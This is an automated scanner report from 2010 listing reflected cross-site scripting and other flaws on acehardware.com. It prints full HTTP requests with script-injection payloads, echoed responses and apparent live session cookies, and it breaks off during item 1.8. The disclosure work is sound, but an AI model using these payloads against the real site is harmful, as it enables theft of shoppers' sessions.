acehardware.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in acehardware.com | Vulnerability Crawler Report

Report generated by XSS.CX at Wed Dec 29 11:39:41 CST 2010.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]

1.2. http://www.acehardware.com/shopbyBrand/index.jsp [name of an arbitrarily supplied request parameter]

1.3. http://www.acehardware.com/cart/index.jsp [Referer HTTP header]

1.4. http://www.acehardware.com/category/index.jsp [Referer HTTP header]

1.5. http://www.acehardware.com/family/index.jsp [Referer HTTP header]

1.6. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

1.7. http://www.acehardware.com/info/asklou.jsp [Referer HTTP header]

1.8. http://www.acehardware.com/info/lawnGarden.jsp [Referer HTTP header]

1.9. http://www.acehardware.com/infodept/iskills.jsp [Referer HTTP header]

1.10. http://www.acehardware.com/paintingtips/index.jsp [Referer HTTP header]

1.11. http://www.acehardware.com/product/close.gif [Referer HTTP header]

1.12. http://www.acehardware.com/product/index.jsp [Referer HTTP header]

1.13. http://www.acehardware.com/product/loading.gif [Referer HTTP header]

1.14. http://www.acehardware.com/reviews/index.jsp [Referer HTTP header]

1.15. http://www.acehardware.com/shop/index.jsp [Referer HTTP header]

2. Session token in URL

3. Cross-domain Referer leakage

3.1. http://www.acehardware.com/home/index.jsp

3.2. http://www.acehardware.com/product/index.jsp

4. Cross-domain script include

4.1. http://www.acehardware.com/affiliate/index.jsp

4.2. http://www.acehardware.com/cart/index.jsp

4.3. http://www.acehardware.com/corp/index.jsp

4.4. http://www.acehardware.com/helpdesk/index.jsp

4.5. http://www.acehardware.com/home/index.jsp

4.6. http://www.acehardware.com/info/lawnGarden.jsp

4.7. http://www.acehardware.com/infodept/iskills.jsp

4.8. http://www.acehardware.com/infohome/index.jsp

4.9. http://www.acehardware.com/paintingtips/index.jsp

4.10. http://www.acehardware.com/product/index.jsp

4.11. http://www.acehardware.com/shopbyBrand/index.jsp

4.12. http://www.acehardware.com/sitemap/index.jsp

5. Cookie without HttpOnly flag set

5.1. http://www.acehardware.com/category/index.jsp

5.2. http://www.acehardware.com/family/index.jsp

5.3. http://www.acehardware.com/product/index.jsp

5.4. http://www.acehardware.com/search/index.jsp

5.5. http://www.acehardware.com/shop/index.jsp



1. Cross-site scripting (reflected)  next
There are 15 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 525bf--><script>alert(1)</script>ac030e2206a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?525bf--><script>alert(1)</script>ac030e2206a=1 HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:35 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: 525bf--><script>alert(1)</script>ac030e2206a=1 -->
...[SNIP]...

1.2. http://www.acehardware.com/shopbyBrand/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /shopbyBrand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9712f--><script>alert(1)</script>989d8804920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopbyBrand/index.jsp?9712f--><script>alert(1)</script>989d8804920=1 HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:26:11 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 408432
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<!-- === Request Query String: 9712f--><script>alert(1)</script>989d8804920=1 -->
...[SNIP]...

1.3. http://www.acehardware.com/cart/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /cart/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47fc5"><script>alert(1)</script>d5e060a75b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cart/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=47fc5"><script>alert(1)</script>d5e060a75b5

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:24:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 86779
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<IFRAME src="http://fls.doubleclick.net/activityi;src=1715989;type=carth726;cat=cartp427;u1=;u2=5;u3=$prod_Id;u4=;u5=http://www.google.com/search?hl=en&q=47fc5"><script>alert(1)</script>d5e060a75b5;u6=0.00;u7=0;ord=1;num=42625028?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.4. http://www.acehardware.com/category/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df32"><script>alert(1)</script>a3892abe44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=7df32"><script>alert(1)</script>a3892abe44

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:47 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=7df32"><script>alert(1)</script>a3892abe44;ord=1;num=84764000?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.5. http://www.acehardware.com/family/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /family/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c50"><script>alert(1)</script>d5e3c86cd80 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /family/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=b4c50"><script>alert(1)</script>d5e3c86cd80

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:47 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=b4c50"><script>alert(1)</script>d5e3c86cd80;ord=1;num=90369077?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.6. http://www.acehardware.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14d7"><script>alert(1)</script>c3178b5f822 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=b14d7"><script>alert(1)</script>c3178b5f822

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=b14d7"><script>alert(1)</script>c3178b5f822;ord=1;num=93258745?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.7. http://www.acehardware.com/info/asklou.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /info/asklou.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b872"><script>alert(1)</script>a2657767c7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /info/asklou.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=4b872"><script>alert(1)</script>a2657767c7

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:24:02 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 75415
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=proje428;u1=;u2=5;u3=;u4=1267993;u5=http://www.google.com/search?hl=en&q=4b872"><script>alert(1)</script>a2657767c7;ord=1;num=79111882?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.8. http://www.acehardware.com/info/lawnGarden.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /info/lawnGarden.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9404a"><script>alert(1)</script>c392790ff13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /info/lawnGarden.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
